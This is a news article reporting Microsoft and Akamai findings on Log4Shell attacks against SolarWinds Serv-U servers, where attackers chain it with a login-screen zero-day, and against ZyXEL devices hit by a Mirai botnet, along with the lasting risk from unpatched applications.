New Log4j attacks target SolarWinds, ZyXEL devices
Cybercriminals looking to capitalize on the Log4Shell vulnerability are attacking devices from SolarWinds and ZyXEL that are known to have used the Log4j library inside their software, according to two reports published on Wednesday by Microsoft and Akamai.
The most urgent of these attacks are those spotted by Microsoft, which said it discovered a threat actor abusing Log4Shell in combination with a zero-day vulnerability in the SolarWinds Serv-U file-sharing server.
Described as an input validation issue in the Serv-U web login screen, Microsoft said the attackers were using the zero-day to bypass input validation on the login process using non-standard characters and then using the Log4Shell exploit to take over Serv-U servers.
In addition to these attacks, Akamai security researcher Larry Cashdollar also reported spotting a Mirai DDoS botnet going after ZyXEL networking devices.
While news cycles move fast from topic to topic, the situation around the Log4Shell exploit has not changed since last month, and the vulnerability is still heavily targeted and abused by threat actors seeking to enter corporate networks.
At the time of writing, there have been reports about threat actors such as ransomware gangs, nation-state cyber-espionage groups, crypto-mining gangs, initial access brokers, and DDoS botnets, all of which have used the vulnerability in past operations.
Although the Apache Software Foundation has released patches for the Log4j library, attacks against applications that use the library are likely to continue because not all of these apps have released their own set of security updates, leaving many networks exposed to attacks and creating a fertile ground for exploitation that is bound to last for years.